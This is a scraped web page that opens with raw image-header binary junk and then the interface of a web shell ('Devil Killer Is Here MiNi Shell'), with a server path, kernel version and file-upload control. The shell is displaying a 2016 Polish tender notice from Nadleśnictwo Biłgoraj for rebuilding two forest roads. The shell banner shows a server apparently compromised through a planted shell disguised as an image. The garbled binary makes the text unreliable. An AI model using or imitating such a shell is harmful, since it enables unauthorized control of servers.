JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160411/83826-N-2016.html

<p class="kh_header"><b>Biłgoraj: Przebudowa (modernizacja)drogi leśnej nr inw. 220/353 w leśnictwie Ciosmy oraz utwardzenie drogi leśnej gruntowej nr inw. B59/23 w Leśnictwie Wola</b><br>
<b>Numer ogłoszenia: 83826 - 2016; data zamieszczenia: 11.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe - Nadleśnictwo Biłgoraj , ul. Zamojska 96, 23-400 Biłgoraj, woj. lubelskie, tel. 84 6860028, 6868099, faks 84 6864259.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa (modernizacja)drogi leśnej nr inw. 220/353 w leśnictwie Ciosmy oraz utwardzenie drogi leśnej gruntowej nr inw. B59/23 w Leśnictwie Wola.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Zad nr 1 - przebudowa (modernizacja) drogi leśnej nr inw. 220/353 w leśnictwie Ciosmy (oddz.13,14,27 - łączna długość 1430mb):
Zakres robót obejmuje:
Zaprojektowana do utwardzenia droga leśna w parametrach drogi klasy D posiada koronę szerokości 5,00 m ze spadkiem daszkowym jezdni 3 %, oraz spadkiem jednostronnym poboczy 8 %. Przyjęto szerokość jezdni 3,50 m, a poboczy gruntowych 2 x 0,75 m. Planowana do przebudowy modernizacji droga leśna długości  1 430,00 m zlokalizowana jest w oddziałach Nr 13, 14, oraz 27 w leśnictwie Ciosmy. Początek drogi km 0+000,00 zlokalizowano w oddziale Nr 27 na krawędzi jezdni drogi leśnej stanowiącej dojazd pożarowy Nr 6 posiadającej nawierzchnię z kruszywa łamanego. Natomiast koniec drogi km 1+430,00 usytuowano w oddziale Nr 13 
w odległości 1430,00 m od początku drogi w osi istniejącego przebiegu w terenie.
Na odcinku planowanym do wykonania zaplanowano wykonanie siedmiu zjazdów na drogi boczne, oraz pięciu mijanek. Zjazdy zlokalizowano w następujących miejscach:
- w km 0+434,00 po stronie prawej drogi, 
- w km 0+444,00 po stronie lewej drogi,
- w km 1+063,00 po stronie lewej drogi na plac do zawracania,
- w km 1+190,00 po stronie lewej drogi,
- w km 1+339,00 po stronie lewej i prawej drogi,
- w km 1+395,00 po stronie prawej drogi.
Pod zjazdem w km 0+444,00 strona lewa zaplanowano przepust rurowy 1 x O 50 z tworzywa sztucznego długości 16,00 m. Przedmiotowe zjazdy posiadają szerokość 3,50 m oraz długość 10,00 m. Przecięcia krawędzi jezdni zjazdów z krawędzią drogi wyokrąglono łukami o promieniu R = 10,00 m. 
Zaprojektowane mijanki posiadają długość 23,00 m, szerokość  3,00 m oraz skosy obustronne 1 : 7 długości 21,00 m oprócz mijanki usytuowanej na początku trasy która posiada skos jednostronny. Pierwsza mijanka została usytuowana na początku trasy tj. na odcinku od km 0+000,00 do km 0+023,00. Lokalizację pozostałych należy uzgodnić na roboczo z Zamawiającym w trakcie realizacji przedsięwzięcia przyjmując odległości między kolejnymi mijankami od 250,00 m do 300,00 m. 
W km 1+063,00 zaplanowano wykonanie placu do nawracania o wymiarach 20,00 x 20,00 m.
Przecięcia krawędzi jezdni drogi leśnej z drogą leśną stanowiącą dojazd pożarowy Nr 6 wyokrąglono łukami 
o promieniu R = 10,00 m.
     
 Parametry drogi leśnej oraz planowany zakres rzeczowy przebudowy:

-długość drogi do przebudowy 						- 1 430,00 m 
-szerokość jezdni 								-        3,50 m
-nawierzchnia drogi z kruszywa łamanego, grub. warstwy 10 cm		- 5 047,92 m2 
-wyrównanie lokalnych nierówności, deformacji i zaniżeń, 
      oraz wyboi i ubytków kruszywem łamanym 				-      58,17 m3 
-ilość zjazdów na drogi boczne						-        7 szt. 
-nawierzchnia zjazdów z kruszywa łamanego, grub. warstwy 15 cm		-    545,44 m2 
ilość mijanek								-        5 szt. 
nawierzchnia mijanek z kruszywa łamanego, grub. warstwy 15 cm		-    628,50 m2 
nawierzchnia placu do zawracania o wym. 20,00 x 20,00 m
      z kruszywa łamanego, grub. warstwy 15 cm				-   400,00 m2
karczowanie pni drzew (łącznie) 						-   116 szt.
karczowanie zagajników rzadkich						- 1 029,50 m2  
karczowanie krzaków średniej gęstości					-   240,00 m2  
karczowanie krzaków rzadkich 						- 1 213,00 m2 przepust rurowy 1 x O 50 z tworzywa sztucznego o sztywności 
      obwodowej SN 8 pod zjazdem w km 0+444,00 strona lewa			-      16,00 m 
renowacja rowu przydrożnego						- 2 611,00 m 
regulacja poboczy								-    239,26 m3 
     w tym:
             -  grunt pozyskany z renowacji rowów przydrożnych w ilości
                 50 % zapotrzebowania 					- 119,63 m3 
              - grunt dowieziony samochodami samowyładowczymi
                 w ilości 50 % zapotrzebowania (materiał Wykonawcy)	 	- 119,63 m3        
plantowanie nasypów 							- 2 670,42 m2 

II      Zad. nr 2 -utwardzenie drogi leśnej gruntowej nr inw. B59/23 w  
       Leśnictwie Wola - (oddz.152,153,154,155 - łączna długość 1500mb)

Zaprojektowana do utwardzenia droga leśna w parametrach drogi klasy D posiada koronę szerokości 5,00 m ze spadkiem daszkowym jezdni 3 %, oraz spadkiem jednostronnym poboczy 8 %. Przyjęto szerokość jezdni 3,50 m, a poboczy gruntowych 2 x 0,75 m. Planowana do przebudowy modernizacji droga leśna długości 1 430,00 m zlokalizowana jest w oddziałach Nr 13, 14, oraz 27 w leśnictwie Ciosmy. Początek drogi km 0+000,00 zlokalizowano w oddziale Nr 27 na krawędzi jezdni drogi leśnej stanowiącej dojazd pożarowy Nr 6 posiadającej nawierzchnię z kruszywa łamanego. Natomiast koniec drogi km 1+430,00 usytuowano w oddziale Nr 13 w odległości 1430,00 m od początku drogi w osi istniejącego przebiegu w terenie.

Na odcinku planowanym do wykonania zaplanowano wykonanie siedmiu zjazdów na drogi boczne, oraz pięciu mijanek. Zjazdy zlokalizowano w następujących miejscach:
- w km 0+434,00 po stronie prawej drogi, 
- w km 0+444,00 po stronie lewej drogi,
- w km 1+063,00 po stronie lewej drogi na plac do zawracania,
- w km 1+190,00 po stronie lewej drogi,
- w km 1+339,00 po stronie lewej i prawej drogi,
- w km 1+395,00 po stronie prawej drogi.
Pod zjazdem w km 0+444,00 strona lewa zaplanowano przepust rurowy 1 x O 50 z tworzywa sztucznego długości 16,00 m. Przedmiotowe zjazdy posiadają szerokość 3,50 m oraz długość 10,00 m. Przecięcia krawędzi jezdni zjazdów z krawędzią drogi wyokrąglono łukami o promieniu R = 10,00 m. 
Zaprojektowane mijanki posiadają długość 23,00 m, szerokość  3,00 m oraz skosy obustronne 1 : 7 długości 21,00 m oprócz mijanki usytuowanej na początku trasy która posiada skos jednostronny. Pierwsza mijanka została usytuowana na początku trasy tj. na odcinku od km 0+000,00 do km 0+023,00. Lokalizację pozostałych należy uzgodnić na roboczo z Zamawiającym w trakcie realizacji przedsięwzięcia przyjmując odległości między kolejnymi mijankami od 250,00 m do 300,00 m. 
W km 1+063,00 zaplanowano wykonanie placu do nawracania o wymiarach 20,00 x 20,00 m.
Przecięcia krawędzi jezdni drogi leśnej z drogą leśną stanowiącą dojazd pożarowy Nr 6 wyokrąglono łukami o promieniu R = 10,00 m.
       
Parametry drogi leśnej oraz planowany zakres rzeczowy przebudowy:

-długość drogi do przebudowy 						- 1 430,00 m 
-szerokość jezdni 								-     3,50 m
-nawierzchnia drogi z kruszywa łamanego, grub. warstwy 10 cm		- 5 047,92 m2 
-wyrównanie lokalnych nierówności, deformacji i zaniżeń, 
      oraz wyboi i ubytków kruszywem łamanym 				-    58,17 m3 
-ilość zjazdów na drogi boczne						-        7 szt. 
-nawierzchnia zjazdów z kruszywa łamanego, grub. warstwy 15 cm
										-    545,44 m2 
-ilość mijanek								-        5 szt. 
-nawierzchnia mijanek z kruszywa łamanego, grub. warstwy 15 cm	   
-    628,50 m2 
-nawierzchnia placu do zawracania o wym. 20,00 x 20,00 m z kruszywa   
      łamanego, grub. warstwy 15 cm						-   400,00 m2
-karczowanie pni drzew (łącznie) 						-   116 szt.
-karczowanie zagajników rzadkich						- 1 029,50 m2  
-karczowanie krzaków średniej gęstości					-   240,00 m2  
-karczowanie krzaków rzadkich 						- 1 213,00 m2 
-przepust rurowy 1 x O 50 z tworzywa sztucznego o sztywności 
      obwodowej SN 8 pod zjazdem w km 0+444,00 strona lewa			-      16,00 m 
-renowacja rowu przydrożnego						- 2 611,00 m 
-regulacja poboczy								-    239,26 m3 
      w tym:
             -  grunt pozyskany z renowacji rowów przydrożnych w ilości
                 50 % zapotrzebowania 					- 119,63 m3 
              - grunt dowieziony samochodami samowyładowczymi
                 w ilości 50 % zapotrzebowania (materiał Wykonawcy)		- 119,63 m3        
-plantowanie nasypów 							- 2 670,42 m2.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego. Zamówienie uzupełniające zostanie udzielone w trybie przewidzianym w art. 67 ust.1 pkt 6 ustawy Pzp, jeżeli zostaną spełnione przesłanki ustawowe.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.10.00.00-8, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każda oferta musi być zabezpieczona wadium w wysokości - 6.000,00 zł (słownie: sześć tysięcy złotych )
2.Wadium może być wniesione w następujących formach:
pieniądzu;
poręczeniach   bankowych   lub   poręczeniach   spółdzielczej   kasy  oszczędnościowo  -
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. nr 42, poz. 275 z późn. zm.).
3.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
Zamawiającego nr 74 1020 5385 0000 9202 0028 0842 
z dopiskiem na blankiecie przelewu - Wadium na przebudowę (modernizację) drogi leśnej nr inw. 220/353 w leśnictwie Ciosmy oraz utwardzenie drogi leśnej gruntowej nr inw. B59/23 w Leśnictwie Wola 
4.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
5.Wadium wniesione w pozostałych formach należy w oryginale dołączyć do oferty. Dokument powinien być dołączony do oferty w sposób umożliwiający dokonanie odłączenia i zwrotu oryginału dokumentu bez uszkodzenia oferty. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być złożony w sposób czytelny umożliwiający jego identyfikację (np. złożony wraz z imienną pieczątką lub czytelny z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać nieodwołalne i bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium na zasadach określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.
6.Wadium wnoszone w pieniądzu musi być wniesione przed upływem terminu składania ofert. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym zamawiającego. Dowód potwierdzający wniesienie wadium należy dołączyć do oferty. Oferta niezabezpieczona akceptowaną formą wadium zostanie odrzucona.
7.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z zastrzeżeniem ust.11, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
8.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zawraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego, oraz wniesieniu zabezpieczenia należytego wykonania umowy.
9.Zamawiający zwróci wadium na wniosek wykonawcy, który przed upływem terminu składania ofert wycofał ofertę.
10.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:

1)odmówił  podpisania  umowy w  sprawie  zamówienia  publicznego  na  warunkach określonych w ofercie,
2)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)sprawił, że zawarcie umowy stało się niemożliwe z przyczyn leżących po jego stronie.

11.Zamawiający zatrzyma także wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń na okoliczność spełnienia warunków udziału w postępowaniu, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie innej omyłki polegającej na niezgodności treści oferty ze SIWZ, niepowodującej istotnych zmian w treści oferty, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
12.Zamawiający zażąda, w wyznaczonym przez siebie terminie, ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ust. 7powyżej, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania zamówienia nie wymaga posiadania szczególnych uprawnień, natomiast uprawnienia do wykonywania czynności zostaną opisane łącznie z warunkami dotyczącymi osób zdolnych do wykonywania zamówieni</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-w celu potwierdzenia wiedzy i doświadczenia wykonawcy winni udokumentować, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie - zrealizowanie co najmniej dwóch robót budowlanych w zakresie budowy, rozbudowy, przebudowy, remontu dróg - o wartości równej lub przekraczającej 150.000,00 zł brutto każda, odpowiednio potwierdzonych, że roboty zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku dotyczącego dysponowania narzędziami i urządzeniami technicznymi niezbędnymi do realizacji zamówienia zamawiający uzna, jeżeli wykonawca dysponuje co najmniej:      - koparką podsiębierną o pojemności łyżki min.0,25 m3,
       - równiarką samojezdną mocy min.100 KM,
       - samochodem dostawczym do 0,9 t,
       - samochodem samowyładowczym do 5 t, 
       - spycharką gąsienicową mocy min.75 KM,
       - środkiem transportowym, 
       - ubijakiem spalinowym min. 200 kg,
       - walcem statyczny samojezdnym min. 10 t,
       - walcem wibracyjnym samojezdnym min. 7,5 t, 
       - żurawiem samojezdnym,
lub zamiennie, jako zespoły sprzętowe w różnych konfiguracjach uzupełniających się wzajemnie o zbliżonych wielkościach, mocy i parametrach.
Wymagana ilość jednostek sprzętowych min. 1 kpl (zestaw).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia zamawiający uzna, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej w branży drogowej (kierownik budowy). Zamawiający w zakresie uprawnień budowlanych dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo budowlane ( tekst jednolity: Dz. U. z 2013 r., poz. 1409 z późn. zm.), ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2008 r., nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje żadnych wymagań, których spełnienie wykonawca byłby zobowiązany wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres bezpłatnej gwarancji maksymalnie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin wykonania robót objętych niniejszą umową ulegnie zmianie w przypadku:

1)	opóźnienia przekazania przez Zamawiającego placu budowy lub frontu prac,
2)	wprowadzenia zmian w dokumentacji technicznej przedmiotu zamówienia w terminie uniemożliwiającym dotrzymanie terminu umownego wykonania robót,
3)	przerw w realizacji robót, powstałych z przyczyn zależnych od Zamawiającego,
4)	zlecenia robót dodatkowych lub zamiennych, jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umowy,
